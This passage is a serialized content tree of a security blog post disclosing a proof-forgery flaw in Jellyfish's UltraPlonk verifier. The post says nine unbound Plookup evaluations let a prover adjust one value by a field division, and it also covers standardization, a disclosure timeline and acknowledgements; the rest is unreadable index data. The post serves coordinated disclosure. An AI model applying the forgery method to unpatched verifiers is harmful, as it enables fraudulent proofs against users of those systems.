Jellyfish",{"type":24,"tag":32,"props":153471,"children":153472},{},[153473,153475,153482],{"type":30,"value":153474},"While investigating PLONK implementations, we found a similar vulnerability in ",{"type":24,"tag":188,"props":153476,"children":153479},{"href":153477,"rel":153478},"https://github.com/EspressoSystems/jellyfish/",[192],[153480],{"type":30,"value":153481},"jf-plonk",{"type":30,"value":153483}," by Espresso Systems. The exact mechanism is different, but the exploitation also boils down to variables that are used in the final check not being cryptographically bound.",{"type":24,"tag":32,"props":153485,"children":153486},{},[153487,153489,153496,153498,153509,153511,153536,153538,153563],{"type":30,"value":153488},"Jellyfish implements UltraPlonk, which extends standard PLONK with ",{"type":24,"tag":188,"props":153490,"children":153493},{"href":153491,"rel":153492},"https://eprint.iacr.org/2020/315",[192],[153494],{"type":30,"value":153495},"Plookup",{"type":30,"value":153497}," lookup arguments. Plookup adds 15 polynomial evaluations to the proof. The function ",{"type":24,"tag":188,"props":153499,"children":153502},{"href":153500,"rel":153501},"https://github.com/EspressoSystems/jellyfish/blob/83e62ed43140d251f8a972033fdd9ddb717c66d7/plonk/src/transcript/mod.rs#L156-L166",[192],[153503],{"type":24,"tag":145,"props":153504,"children":153506},{"className":153505},[],[153507],{"type":30,"value":153508},"append_plookup_evaluations",{"type":30,"value":153510}," was supposed to add all 15 to the Fiat-Shamir transcript before the batching challenge ",{"type":24,"tag":145,"props":153512,"children":153514},{"className":153513},[10807,10808],[153515],{"type":24,"tag":301,"props":153516,"children":153518},{"className":153517},[10813],[153519],{"type":24,"tag":301,"props":153520,"children":153522},{"className":153521,"ariaHidden":10819},[10818],[153523],{"type":24,"tag":301,"props":153524,"children":153526},{"className":153525},[10824],[153527,153531],{"type":24,"tag":301,"props":153528,"children":153530},{"className":153529,"style":117581},[10829],[],{"type":24,"tag":301,"props":153532,"children":153534},{"className":153533,"style":100230},[10835,28357],[153535],{"type":30,"value":120643},{"type":30,"value":153537}," is derived. Instead, it only added 6 of the 15, and the remaining 9 evaluations are used in the batched verification check but don't influence ",{"type":24,"tag":145,"props":153539,"children":153541},{"className":153540},[10807,10808],[153542],{"type":24,"tag":301,"props":153543,"children":153545},{"className":153544},[10813],[153546],{"type":24,"tag":301,"props":153547,"children":153549},{"className":153548,"ariaHidden":10819},[10818],[153550],{"type":24,"tag":301,"props":153551,"children":153553},{"className":153552},[10824],[153554,153558],{"type":24,"tag":301,"props":153555,"children":153557},{"className":153556,"style":117581},[10829],[],{"type":24,"tag":301,"props":153559,"children":153561},{"className":153560,"style":100230},[10835,28357],[153562],{"type":30,"value":120643},{"type":30,"value":153564},", so the prover can adjust them after the fact to make the check pass.",{"type":24,"tag":32,"props":153566,"children":153567},{},[153568,153570,153576,153578,153584],{"type":30,"value":153569},"The attack requires modifying a single evaluation (",{"type":24,"tag":145,"props":153571,"children":153573},{"className":153572},[],[153574],{"type":30,"value":153575},"key_table_next_eval",{"type":30,"value":153577},") by ",{"type":24,"tag":145,"props":153579,"children":153581},{"className":153580},[],[153582],{"type":30,"value":153583},"delta / (u * v^3)",{"type":30,"value":153585}," to close the gap between the true and expected batched evaluation, which, like the Dusk exploit, reduces to a single field division.",{"type":24,"tag":32,"props":153587,"children":153588},{},[153589,153591,153598,153600,153611],{"type":30,"value":153590},"To our knowledge, Jellyfish's UltraPlonk mode is not currently deployed in production. ",{"type":24,"tag":188,"props":153592,"children":153595},{"href":153593,"rel":153594},"https://github.com/EspressoSystems/jellyfish/pull/867",[192],[153596],{"type":30,"value":153597},"PR #867",{"type":30,"value":153599}," fixed the issue and was tagged as ",{"type":24,"tag":188,"props":153601,"children":153604},{"href":153602,"rel":153603},"https://github.com/EspressoSystems/jellyfish/tree/jf-plonk-v0.8.0",[192],[153605],{"type":24,"tag":145,"props":153606,"children":153608},{"className":153607},[],[153609],{"type":30,"value":153610},"jf-plonk-v0.8.0",{"type":30,"value":153612}," on March 18, 2026.",{"type":24,"tag":2719,"props":153614,"children":153615},{},[],{"type":24,"tag":43,"props":153617,"children":153619},{"id":153618},"toward-standardization",[153620],{"type":30,"value":153621},"Toward standardization",{"type":24,"tag":32,"props":153623,"children":153624},{},[153625,153627,153634],{"type":30,"value":153626},"The fact that two independent PLONK implementations contain the same class of bug, and that ",{"type":24,"tag":188,"props":153628,"children":153631},{"href":153629,"rel":153630},"https://osec.io/blog/2026-03-03-zkvms-unfaithful-claims/",[192],[153632],{"type":30,"value":153633},"similar patterns appear across zkVMs",{"type":30,"value":153635},", suggests this isn't a problem that individual audits alone can solve. The check described above (diff \"evaluations used\" against \"evaluations bound\") is mechanical and could be built into development tooling, CI pipelines, or standardized PLONK verification specifications.",{"type":24,"tag":32,"props":153637,"children":153638},{},[153639],{"type":30,"value":153640},"We're in early discussions with the Dusk team and other stakeholders about what a PLONK standardization effort could look like: a curve-agnostic, backend-agnostic specification of the verification protocol that makes invariants like evaluation binding explicit and checkable.",{"type":24,"tag":32,"props":153642,"children":153643},{},[153644],{"type":30,"value":153645},"The status quo, where each team implements their own PLONK variant from the paper and hopes the auditor catches what they missed, is fragile. A shared, well-reviewed verification spec would reduce the surface area for these bugs and give auditors a concrete checklist to verify against.",{"type":24,"tag":43,"props":153647,"children":153648},{"id":67536},[153649],{"type":30,"value":153650},"Disclosure timeline",{"type":24,"tag":62466,"props":153652,"children":153653},{},[153654,153670],{"type":24,"tag":129689,"props":153655,"children":153656},{},[153657],{"type":24,"tag":129693,"props":153658,"children":153659},{},[153660,153665],{"type":24,"tag":129697,"props":153661,"children":153662},{},[153663],{"type":30,"value":153664},"Date",{"type":24,"tag":129697,"props":153666,"children":153667},{},[153668],{"type":30,"value":153669},"Event",{"type":24,"tag":129717,"props":153671,"children":153672},{},[153673,153686,153699,153711,153737,153757],{"type":24,"tag":129693,"props":153674,"children":153675},{},[153676,153681],{"type":24,"tag":129724,"props":153677,"children":153678},{},[153679],{"type":30,"value":153680},"2026-02-13",{"type":24,"tag":129724,"props":153682,"children":153683},{},[153684],{"type":30,"value":153685},"Dusk vulnerability reported",{"type":24,"tag":129693,"props":153687,"children":153688},{},[153689,153694],{"type":24,"tag":129724,"props":153690,"children":153691},{},[153692],{"type":30,"value":153693},"2026-02-14",{"type":24,"tag":129724,"props":153695,"children":153696},{},[153697],{"type":30,"value":153698},"Dusk acknowledged",{"type":24,"tag":129693,"props":153700,"children":153701},{},[153702,153706],{"type":24,"tag":129724,"props":153703,"children":153704},{},[153705],{"type":30,"value":153693},{"type":24,"tag":129724,"props":153707,"children":153708},{},[153709],{"type":30,"value":153710},"Dusk fix committed",{"type":24,"tag":129693,"props":153712,"children":153713},{},[153714,153719],{"type":24,"tag":129724,"props":153715,"children":153716},{},[153717],{"type":30,"value":153718},"2026-02-27",{"type":24,"tag":129724,"props":153720,"children":153721},{},[153722,153724,153735],{"type":30,"value":153723},"Public ",{"type":24,"tag":188,"props":153725,"children":153728},{"href":153726,"rel":153727},"https://github.com/dusk-network/rusk/releases/tag/dusk-rusk-1.6.0",[192],[153729],{"type":24,"tag":145,"props":153730,"children":153732},{"className":153731},[],[153733],{"type":30,"value":153734},"dusk-rusk-1.6.0",{"type":30,"value":153736}," release published",{"type":24,"tag":129693,"props":153738,"children":153739},{},[153740,153745],{"type":24,"tag":129724,"props":153741,"children":153742},{},[153743],{"type":30,"value":153744},"2026-03-16",{"type":24,"tag":129724,"props":153746,"children":153747},{},[153748,153750,153756],{"type":30,"value":153749},"Jellyfish fix PR opened (",{"type":24,"tag":188,"props":153751,"children":153753},{"href":153593,"rel":153752},[192],[153754],{"type":30,"value":153755},"#867",{"type":30,"value":9961},{"type":24,"tag":129693,"props":153758,"children":153759},{},[153760,153765],{"type":24,"tag":129724,"props":153761,"children":153762},{},[153763],{"type":30,"value":153764},"2026-03-18",{"type":24,"tag":129724,"props":153766,"children":153767},{},[153768,153770,153775,153777],{"type":30,"value":153769},"Jellyfish fix merged in ",{"type":24,"tag":188,"props":153771,"children":153773},{"href":153593,"rel":153772},[192],[153774],{"type":30,"value":153755},{"type":30,"value":153776}," and tagged as ",{"type":24,"tag":188,"props":153778,"children":153780},{"href":153602,"rel":153779},[192],[153781],{"type":24,"tag":145,"props":153782,"children":153784},{"className":153783},[],[153785],{"type":30,"value":153610},{"type":24,"tag":43,"props":153787,"children":153789},{"id":153788},"acknowledgements",[153790],{"type":30,"value":153791},"Acknowledgements",{"type":24,"tag":32,"props":153793,"children":153794},{},[153795],{"type":30,"value":153796},"We thank the Dusk team for responding within a day, coordinating the fix transparently, and engaging on the broader standardization question. We also thank the Espresso Systems team for turning around the Jellyfish patch in under a week.",{"title":7,"searchDepth":320,"depth":320,"links":153798},[153799,153806,153807,153808,153809,153810,153811,153812,153813,153814,153815,153816],{"id":148617,"depth":320,"text":148620,"children":153800},[153801,153802,153803,153804,153805],{"id":148642,"depth":335,"text":148645},{"id":149445,"depth":335,"text":149448},{"id":150642,"depth":335,"text":150645},{"id":150672,"depth":335,"text":150675},{"id":150953,"depth":335,"text":150956},{"id":151686,"depth":320,"text":151689},{"id":151824,"depth":320,"text":151827},{"id":97002,"depth":320,"text":152455},{"id":153054,"depth":320,"text":153057},{"id":153191,"depth":320,"text":153194},{"id":153306,"depth":320,"text":153309},{"id":153399,"depth":320,"text":153402},{"id":153466,"depth":320,"text":153469},{"id":153618,"depth":320,"text":153621},{"id":67536,"depth":320,"text":153650},{"id":153788,"depth":320,"text":153791},"content:blog:2026-04-30-unverified-evaluations-dusk-plonk.md","blog/2026-04-30-unverified-evaluations-dusk-plonk.md","blog/2026-04-30-unverified-evaluations-dusk-plonk",{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":9,"date":10,"author":11,"image":153821,"isFeatured":16,"onBlogPage":16,"tags":153822,"body":153823,"_type":9700,"_id":9701,"_source":9702,"_file":9703,"_stem":9704,"_extension":9705},{"src":13,"width":14,"height":15},[18,19],{"type":21,"children":153824,"toc":162139},[153825,153829,153833,153837,153841,153845,153859,153863,153867,153871,153875,153879,153883,153887,153891,153895,153899,153903,153907,153923,153933,153939,153955,153965,153971,153975,153984,154000,154004,154008,154018,154344,154348,154355,154359,154375,154661,154683,154717,154727,154734,154738,155197,155213,155229,155553,155575,155846,155868,155890,156090,156106,156113,156129,156133,156185,156188,156204,156208,156212,156216,156220,156224,156234,156238,156248,156252,156262,156266,156273,156277,156281,156297,156304,156314,156317,156321,156331,156335,156339,156343,156347,156366,156370,156374,156378,156388,156398,156507,156523,156527,156531,156535,156539,156555,157147,157157,158180,158184,158190,158194,158198,158202,158209,158219,158223,158227,158233,158243,158247,158253,158299,158315,158321,158337,158343,158346,158350,158354,158358,158368,158378,158385,158443,158453,158481,158488,158492,158496,158500,158510,158526,158536,158540,158547,158562,158569,158585,158592,158614,158621,158625,158632,158636,158643,158646,158650,158654,158658,158668,158684,158717,158745,158752,158756,158760,158764,158768,158772,158782,158937,158947,158954,158958,158964,158968,159020,159060,159070,159074,159095,159164,159197,159201,159208,159224,159228,159249,159279,159325,159365,159369,159385,159413,159420,159508,159566,159570,159591,159597,159601,159607,159611,159835,159857,159861,159902,159906,159910,159938,159948,159976,159983,160017,160024,160028,160035,160039,160046,160056,160063,160073,160080,160090,160106,160110,160126,160142,160149,160159,160166,160182,160186,160193,160197,160204,160226,160236,160243,160247,160254,160258,160265,160269,160276,160280,160287,160291,160298,160302,160309,160343,160350,160354,160361,160365,160372,160376,160383,160387,160391,160398,160402,160409,160431,160438,160460,160467,160471,160478,160482,160489,160496,160500,160507,160511,160518,160521,160531,160559,160575,160582,160598,160602,160618,160669,160685,160692,160695,160729,160781,160785,160789,160799,160806,160852,160886,160893,160921,160924,160940,160947,160951,160955,160962,160996,161030,161046,161050,161054,161069,161073,161077,161093,161145,161152,161174,161178,161194,161198,161202,161208,161260,161264,161270,161286,161290,161300,161304,161332,161338,161342,161364,161370,161416,161426,161432,161484,161500,161504,161532,161548,161570,161577,161623,161681,161685,161701,161735,161739,162102,162106,162110,162119,162123,162127,162131,162135],{"type":24,"tag":25,"props":153826,"children":153827},{"id":27},[153828],{"type":30,"value":8},{"type":24,"tag":32,"props":153830,"children":153831},{},[153832],{"type":30,"value":36},{"type":24,"tag":32,"props":153834,"children":153835},{},[153836],{"type":30,"value":41},{"type":24,"tag":43,"props":153838,"children":153839},{"id":45},[153840],{"type":30,"value":48},{"type":24,"tag":32,"props":153842,"children":153843},{},[153844],{"type":30,"value":53},{"type":24,"tag":32,"props":153846,"children":153847},{},[153848,153849,153853,153854,153858],{"type":30,"value":58},{"type":24,"tag":60,"props":153850,"children":153851},{},[153852],{"type":30,"value":64},{"type":30,"value":66},{"type":24,"tag":60,"props":153855,"children":153856},{},[153857],{"type":30,"value":71},{"type":30,"value":73},{"type":24,"tag":32,"props":153860,"children":153861},{},[153862],{"type":30,"value":78},{"type":24,"tag":80,"props":153864,"children":153865},{"id":82},[153866],{"type":30,"value":85},{"type":24,"tag":32,"props":153868,"children":153869},{},[153870],{"type":30,"value":90},{"type":24,"tag":32,"props":153872,"children":153873},{},[153874],{"type":30,"value":95},{"type":24,"tag":80,"props":153876,"children":153877},{"id":98},[153878],{"type":30,"value":101},{"type":24,"tag":32,"props":153880,"children":153881},{},[153882],{"type":30,"value":106},{"type":24,"tag":32,"props":153884,"children":153885},{},[153886],{"type":30,"value":111},{"type":24,"tag":32,"props":153888,"children":153889},{},[153890],{"type":30,"value":116},{"type":24,"tag":43,"props":153892,"children":153893},{"id":119},[153894],{"type":30,"value":122},{"type":24,"tag":32,"props":153896,"children":153897},{},[153898],{"type":30,"value":127},{"type":24,"tag":32,"props":153900,"children":153901},{},[153902],{"type":30,"value":132},{"type":24,"tag":80,"props":153904,"children":153905},{"id":135},[153906],{"type":30,"value":138},{"type":24,"tag":32,"props":153908,"children":153909},{},[153910,153911,153916,153917,153922],{"type":30,"value":143},{"type":24,"tag":145,"props":153912,"children":153914},{"className":153913},[],[153915],{"type":30,"value":150},{"type":30,"value":152},{"type":24,"tag":145,"props":153918,"children":153920},{"className":153919},[],[153921],{"type":30,"value":158},{"type":30,"value":160},{"type":24,"tag":32,"props":153924,"children":153925},{},[153926,153927,153932],{"type":30,"value":165},{"type":24,"tag":145,"props":153928,"children":153930},{"className":153929},[],[153931],{"type":30,"value":158},{"type":30,"value":172},{"type":24,"tag":32,"props":153934,"children":153935},{},[153936],{"type":24,"tag":177,"props":153937,"children":153938},{"alt":179,"src":180},[],{"type":24,"tag":32,"props":153940,"children":153941},{},[153942,153943,153948,153949,153954],{"type":30,"value":186},{"type":24,"tag":188,"props":153944,"children":153946},{"href":190,"rel":153945},[192],[153947],{"type":30,"value":195},{"type":30,"value":197},{"type":24,"tag":188,"props":153950,"children":153952},{"href":200,"rel":153951},[192],[153953],{"type":30,"value":204},{"type":30,"value":206},{"type":24,"tag":32,"props":153956,"children":153957},{},[153958,153959,153964],{"type":30,"value":211},{"type":24,"tag":188,"props":153960,"children":153962},{"href":214,"rel":153961},[192],[153963],{"type":30,"value":218},{"type":30,"value":220},{"type":24,"tag":32,"props":153966,"children":153967},{},[153968],{"type":24,"tag":177,"props":153969,"children":153970},{"alt":179,"src":226},[],{"type":24,"tag":80,"props":153972,"children":153973},{"id":230},[153974],{"type":30,"value":233},{"type":24,"tag":32,"props":153976,"children":153977},{},[153978,153983],{"type":24,"tag":145,"props":153979,"children":153981},{"className":153980},[],[153982],{"type":30,"value":195},{"type":30,"value":243},{"type":24,"tag":32,"props":153985,"children":153986},{},[153987,153988,153993,153994,153999],{"type":30,"value":248},{"type":24,"tag":145,"props":153989,"children":153991},{"className":153990},[],[153992],{"type":30,"value":195},{"type":30,"value":255},{"type":24,"tag":188,"props":153995,"children":153997},{"href":258,"rel":153996},[192],[153998],{"type":30,"value":262},{"type":30,"value":206},{"type":24,"tag":32,"props":154001,"children":154002},{},[154003],{"type":30,"value":268},{"type":24,"tag":270,"props":154005,"children":154006},{"id":272},[154007],{"type":30,"value":275},{"type":24,"tag":32,"props":154009,"children":154010},{},[154011,154012,154017],{"type":30,"value":280},{"type":24,"tag":188,"props":154013,"children":154015},{"href":283,"rel":154014},[192],[154016],{"type":30,"value":287},{"type":30,"value":289},{"type":24,"tag":291,"props":154019,"children":154020},{"code":293,"language":294,"meta":7,"className":295,"style":7},[154021],{"type":24,"tag":145,"props":154022,"children":154023},{"__ignoreMap":7},[154024,154035,154046,154053,154096,154107,154126,154133,154156,154171,154178,154185,154252,154275,154290,154297,154304,154315,154322,154337],{"type":24,"tag":301,"props":154025,"children":154026},{"class":303,"line":304},[154027,154031],{"type":24,"tag":301,"props":154028,"children":154029},{"style":308},[154030],{"type":30,"value":311},{"type":24,"tag":301,"props":154032,"children":154033},{"style":314},[154034],{"type":30,"value":317},{"type":24,"tag":301,"props":154036,"children":154037},{"class":303,"line":320},[154038,154042],{"type":24,"tag":301,"props":154039,"children":154040},{"style":308},[154041],{"type":30,"value":326},{"type":24,"tag":301,"props":154043,"children":154044},{"style":329},[154045],{"type":30,"value":332},{"type":24,"tag":301,"props":154047,"children":154048},{"class":303,"line":335},[154049],{"type":24,"tag":301,"props":154050,"children":154051},{"emptyLinePlaceholder":16},[154052],{"type":30,"value":341},{"type":24,"tag":301,"props":154054,"children":154055},{"class":303,"line":344},[154056,154060,154064,154068,154072,154076,154080,154084,154088,154092],{"type":24,"tag":301,"props":154057,"children":154058},{"style":348},[154059],{"type":30,"value":351},{"type":24,"tag":301,"props":154061,"children":154062},{"style":314},[154063],{"type":30,"value":356},{"type":24,"tag":301,"props":154065,"children":154066},{"style":359},[154067],{"type":30,"value":362},{"type":24,"tag":301,"props":154069,"children":154070},{"style":348},[154071],{"type":30,"value":351},{"type":24,"tag":301,"props":154073,"children":154074},{"style":369},[154075],{"type":30,"value":372},{"type":24,"tag":301,"props":154077,"children":154078},{"style":359},[154079],{"type":30,"value":377},{"type":24,"tag":301,"props":154081,"children":154082},{"style":348},[154083],{"type":30,"value":382},{"type":24,"tag":301,"props":154085,"children":154086},{"style":385},[154087],{"type":30,"value":388},{"type":24,"tag":301,"props":154089,"children":154090},{"style":369},[154091],{"type":30,"value":393},{"type":24,"tag":301,"props":154093,"children":154094},{"style":359},[154095],{"type":30,"value":398},{"type":24,"tag":301,"props":154097,"children":154098},{"class":303,"line":401},[154099,154103],{"type":24,"tag":301,"props":154100,"children":154101},{"style":348},[154102],{"type":30,"value":407},{"type":24,"tag":301,"props":154104,"children":154105},{"style":359},[154106],{"type":30,"value":412},{"type":24,"tag":301,"props":154108,"children":154109},{"class":303,"line":415},[154110,154114,154118,154122],{"type":24,"tag":301,"props":154111,"children":154112},{"style":348},[154113],{"type":30,"value":421},{"type":24,"tag":301,"props":154115,"children":154116},{"style":348},[154117],{"type":30,"value":426},{"type":24,"tag":301,"props":154119,"children":154120},{"style":385},[154121],{"type":30,"value":431},{"type":24,"tag":301,"props":154123,"children":154124},{"style":359},[154125],{"type":30,"value":436},{"type":24,"tag":301,"props":154127,"children":154128},{"class":303,"line":439},[154129],{"type":24,"tag":301,"props":154130,"children":154131},{"emptyLinePlaceholder":16},[154132],{"type":30,"value":341},{"type":24,"tag":301,"props":154134,"children":154135},{"class":303,"line":447},[154136,154140,154144,154148,154152],{"type":24,"tag":301,"props":154137,"children":154138},{"style":308},[154139],{"type":30,"value":453},{"type":24,"tag":301,"props":154141,"children":154142},{"style":359},[154143],{"type":30,"value":458},{"type":24,"tag":301,"props":154145,"children":154146},{"style":385},[154147],{"type":30,"value":463},{"type":24,"tag":301,"props":154149,"children":154150},{"style":466},[154151],{"type":30,"value":469},{"type":24,"tag":301,"props":154153,"children":154154},{"style":359},[154155],{"type":30,"value":398},{"type":24,"tag":301,"props":154157,"children":154158},{"class":303,"line":476},[154159,154163,154167],{"type":24,"tag":301,"props":154160,"children":154161},{"style":308},[154162],{"type":30,"value":482},{"type":24,"tag":301,"props":154164,"children":154165},{"style":466},[154166],{"type":30,"value":487},{"type":24,"tag":301,"props":154168,"children":154169},{"style":359},[154170],{"type":30,"value":492},{"type":24,"tag":301,"props":154172,"children":154173},{"class":303,"line":495},[154174],{"type":24,"tag":301,"props":154175,"children":154176},{"style":359},[154177],{"type":30,"value":501},{"type":24,"tag":301,"props":154179,"children":154180},{"class":303,"line":504},[154181],{"type":24,"tag":301,"props":154182,"children":154183},{"emptyLinePlaceholder":16},[154184],{"type":30,"value":341},{"type":24,"tag":301,"props":154186,"children":154187},{"class":303,"line":512},[154188,154192,154196,154200,154204,154208,154212,154216,154220,154224,154228,154232,154236,154240,154244,154248],{"type":24,"tag":301,"props":154189,"children":154190},{"style":359},[154191],{"type":30,"value":518},{"type":24,"tag":301,"props":154193,"children":154194},{"style":385},[154195],{"type":30,"value":523},{"type":24,"tag":301,"props":154197,"children":154198},{"style":314},[154199],{"type":30,"value":528},{"type":24,"tag":301,"props":154201,"children":154202},{"style":359},[154203],{"type":30,"value":362},{"type":24,"tag":301,"props":154205,"children":154206},{"style":369},[154207],{"type":30,"value":393},{"type":24,"tag":301,"props":154209,"children":154210},{"style":359},[154211],{"type":30,"value":541},{"type":24,"tag":301,"props":154213,"children":154214},{"style":466},[154215],{"type":30,"value":546},{"type":24,"tag":301,"props":154217,"children":154218},{"style":359},[154219],{"type":30,"value":551},{"type":24,"tag":301,"props":154221,"children":154222},{"style":385},[154223],{"type":30,"value":556},{"type":24,"tag":301,"props":154225,"children":154226},{"style":359},[154227],{"type":30,"value":561},{"type":24,"tag":301,"props":154229,"children":154230},{"style":385},[154231],{"type":30,"value":556},{"type":24,"tag":301,"props":154233,"children":154234},{"style":359},[154235],{"type":30,"value":570},{"type":24,"tag":301,"props":154237,"children":154238},{"style":385},[154239],{"type":30,"value":556},{"type":24,"tag":301,"props":154241,"children":154242},{"style":359},[154243],{"type":30,"value":579},{"type":24,"tag":301,"props":154245,"children":154246},{"style":466},[154247],{"type":30,"value":584},{"type":24,"tag":301,"props":154249,"children":154250},{"style":359},[154251],{"type":30,"value":589},{"type":24,"tag":301,"props":154253,"children":154254},{"class":303,"line":592},[154255,154259,154263,154267,154271],{"type":24,"tag":301,"props":154256,"children":154257},{"style":308},[154258],{"type":30,"value":453},{"type":24,"tag":301,"props":154260,"children":154261},{"style":359},[154262],{"type":30,"value":602},{"type":24,"tag":301,"props":154264,"children":154265},{"style":385},[154266],{"type":30,"value":607},{"type":24,"tag":301,"props":154268,"children":154269},{"style":348},[154270],{"type":30,"value":612},{"type":24,"tag":301,"props":154272,"children":154273},{"style":359},[154274],{"type":30,"value":398},{"type":24,"tag":301,"props":154276,"children":154277},{"class":303,"line":619},[154278,154282,154286],{"type":24,"tag":301,"props":154279,"children":154280},{"style":308},[154281],{"type":30,"value":482},{"type":24,"tag":301,"props":154283,"children":154284},{"style":466},[154285],{"type":30,"value":487},{"type":24,"tag":301,"props":154287,"children":154288},{"style":359},[154289],{"type":30,"value":492},{"type":24,"tag":301,"props":154291,"children":154292},{"class":303,"line":635},[154293],{"type":24,"tag":301,"props":154294,"children":154295},{"style":359},[154296],{"type":30,"value":501},{"type":24,"tag":301,"props":154298,"children":154299},{"class":303,"line":643},[154300],{"type":24,"tag":301,"props":154301,"children":154302},{"style":359},[154303],{"type":30,"value":649},{"type":24,"tag":301,"props":154305,"children":154306},{"class":303,"line":652},[154307,154311],{"type":24,"tag":301,"props":154308,"children":154309},{"style":314},[154310],{"type":30,"value":658},{"type":24,"tag":301,"props":154312,"children":154313},{"style":359},[154314],{"type":30,"value":663},{"type":24,"tag":301,"props":154316,"children":154317},{"class":303,"line":666},[154318],{"type":24,"tag":301,"props":154319,"children":154320},{"emptyLinePlaceholder":16},[154321],{"type":30,"value":341},{"type":24,"tag":301,"props":154323,"children":154324},{"class":303,"line":674},[154325,154329,154333],{"type":24,"tag":301,"props":154326,"children":154327},{"style":308},[154328],{"type":30,"value":680},{"type":24,"tag":301,"props":154330,"children":154331},{"style":466},[154332],{"type":30,"value":685},{"type":24,"tag":301,"props":154334,"children":154335},{"style":359},[154336],{"type":30,"value":492},{"type":24,"tag":301,"props":154338,"children":154339},{"class":303,"line":692},[154340],{"type":24,"tag":301,"props":154341,"children":154342},{"style":359},[154343],{"type":30,"value":698},{"type":24,"tag":32,"props":154345,"children":154346},{},[154347],{"type":30,"value":703},{"type":24,"tag":291,"props":154349,"children":154350},{"code":706},[154351],{"type":24,"tag":145,"props":154352,"children":154353},{"__ignoreMap":7},[154354],{"type":30,"value":706},{"type":24,"tag":270,"props":154356,"children":154357},{"id":714},[154358],{"type":30,"value":717},{"type":24,"tag":32,"props":154360,"children":154361},{},[154362,154363,154368,154369,154374],{"type":30,"value":722},{"type":24,"tag":145,"props":154364,"children":154366},{"className":154365},[],[154367],{"type":30,"value":728},{"type":30,"value":730},{"type":24,"tag":145,"props":154370,"children":154372},{"className":154371},[],[154373],{"type":30,"value":195},{"type":30,"value":737},{"type":24,"tag":291,"props":154376,"children":154377},{"code":740,"language":294,"meta":7,"className":295,"style":7},[154378],{"type":24,"tag":145,"props":154379,"children":154380},{"__ignoreMap":7},[154381,154420,154427,154450,154461,154468,154475,154482,154533,154540,154583,154614],{"type":24,"tag":301,"props":154382,"children":154383},{"class":303,"line":304},[154384,154388,154392,154396,154400,154404,154408,154412,154416],{"type":24,"tag":301,"props":154385,"children":154386},{"style":348},[154387],{"type":30,"value":752},{"type":24,"tag":301,"props":154389,"children":154390},{"style":348},[154391],{"type":30,"value":757},{"type":24,"tag":301,"props":154393,"children":154394},{"style":314},[154395],{"type":30,"value":762},{"type":24,"tag":301,"props":154397,"children":154398},{"style":359},[154399],{"type":30,"value":767},{"type":24,"tag":301,"props":154401,"children":154402},{"style":385},[154403],{"type":30,"value":772},{"type":24,"tag":301,"props":154405,"children":154406},{"style":369},[154407],{"type":30,"value":777},{"type":24,"tag":301,"props":154409,"children":154410},{"style":359},[154411],{"type":30,"value":782},{"type":24,"tag":301,"props":154413,"children":154414},{"style":369},[154415],{"type":30,"value":145},{"type":24,"tag":301,"props":154417,"children":154418},{"style":359},[154419],{"type":30,"value":791},{"type":24,"tag":301,"props":154421,"children":154422},{"class":303,"line":320},[154423],{"type":24,"tag":301,"props":154424,"children":154425},{"style":359},[154426],{"type":30,"value":799},{"type":24,"tag":301,"props":154428,"children":154429},{"class":303,"line":335},[154430,154434,154438,154442,154446],{"type":24,"tag":301,"props":154431,"children":154432},{"style":359},[154433],{"type":30,"value":807},{"type":24,"tag":301,"props":154435,"children":154436},{"style":385},[154437],{"type":30,"value":772},{"type":24,"tag":301,"props":154439,"children":154440},{"style":359},[154441],{"type":30,"value":816},{"type":24,"tag":301,"props":154443,"children":154444},{"style":385},[154445],{"type":30,"value":772},{"type":24,"tag":301,"props":154447,"children":154448},{"style":359},[154449],{"type":30,"value":825},{"type":24,"tag":301,"props":154451,"children":154452},{"class":303,"line":344},[154453,154457],{"type":24,"tag":301,"props":154454,"children":154455},{"style":348},[154456],{"type":30,"value":833},{"type":24,"tag":301,"props":154458,"children":154459},{"style":359},[154460],{"type":30,"value":838},{"type":24,"tag":301,"props":154462,"children":154463},{"class":303,"line":401},[154464],{"type":24,"tag":301,"props":154465,"children":154466},{"emptyLinePlaceholder":16},[154467],{"type":30,"value":341},{"type":24,"tag":301,"props":154469,"children":154470},{"class":303,"line":415},[154471],{"type":24,"tag":301,"props":154472,"children":154473},{"style":359},[154474],{"type":30,"value":853},{"type":24,"tag":301,"props":154476,"children":154477},{"class":303,"line":439},[154478],{"type":24,"tag":301,"props":154479,"children":154480},{"emptyLinePlaceholder":16},[154481],{"type":30,"value":341},{"type":24,"tag":301,"props":154483,"children":154484},{"class":303,"line":447},[154485,154489,154493,154497,154501,154505,154509,154513,154517,154521,154525,154529],{"type":24,"tag":301,"props":154486,"children":154487},{"style":308},[154488],{"type":30,"value":868},{"type":24,"tag":301,"props":154490,"children":154491},{"style":359},[154492],{"type":30,"value":873},{"type":24,"tag":301,"props":154494,"children":154495},{"style":369},[154496],{"type":30,"value":777},{"type":24,"tag":301,"props":154498,"children":154499},{"style":359},[154500],{"type":30,"value":882},{"type":24,"tag":301,"props":154502,"children":154503},{"style":369},[154504],{"type":30,"value":887},{"type":24,"tag":301,"props":154506,"children":154507},{"style":385},[154508],{"type":30,"value":892},{"type":24,"tag":301,"props":154510,"children":154511},{"style":369},[154512],{"type":30,"value":897},{"type":24,"tag":301,"props":154514,"children":154515},{"style":359},[154516],{"type":30,"value":882},{"type":24,"tag":301,"props":154518,"children":154519},{"style":369},[154520],{"type":30,"value":906},{"type":24,"tag":301,"props":154522,"children":154523},{"style":359},[154524],{"type":30,"value":911},{"type":24,"tag":301,"props":154526,"children":154527},{"style":308},[154528],{"type":30,"value":916},{"type":24,"tag":301,"props":154530,"children":154531},{"style":359},[154532],{"type":30,"value":492},{"type":24,"tag":301,"props":154534,"children":154535},{"class":303,"line":476},[154536],{"type":24,"tag":301,"props":154537,"children":154538},{"emptyLinePlaceholder":16},[154539],{"type":30,"value":341},{"type":24,"tag":301,"props":154541,"children":154542},{"class":303,"line":495},[154543,154547,154551,154555,154559,154563,154567,154571,154575,154579],{"type":24,"tag":301,"props":154544,"children":154545},{"style":359},[154546],{"type":30,"value":935},{"type":24,"tag":301,"props":154548,"children":154549},{"style":385},[154550],{"type":30,"value":523},{"type":24,"tag":301,"props":154552,"children":154553},{"style":369},[154554],{"type":30,"value":897},{"type":24,"tag":301,"props":154556,"children":154557},{"style":359},[154558],{"type":30,"value":882},{"type":24,"tag":301,"props":154560,"children":154561},{"style":369},[154562],{"type":30,"value":952},{"type":24,"tag":301,"props":154564,"children":154565},{"style":385},[154566],{"type":30,"value":957},{"type":24,"tag":301,"props":154568,"children":154569},{"style":369},[154570],{"type":30,"value":897},{"type":24,"tag":301,"props":154572,"children":154573},{"style":359},[154574],{"type":30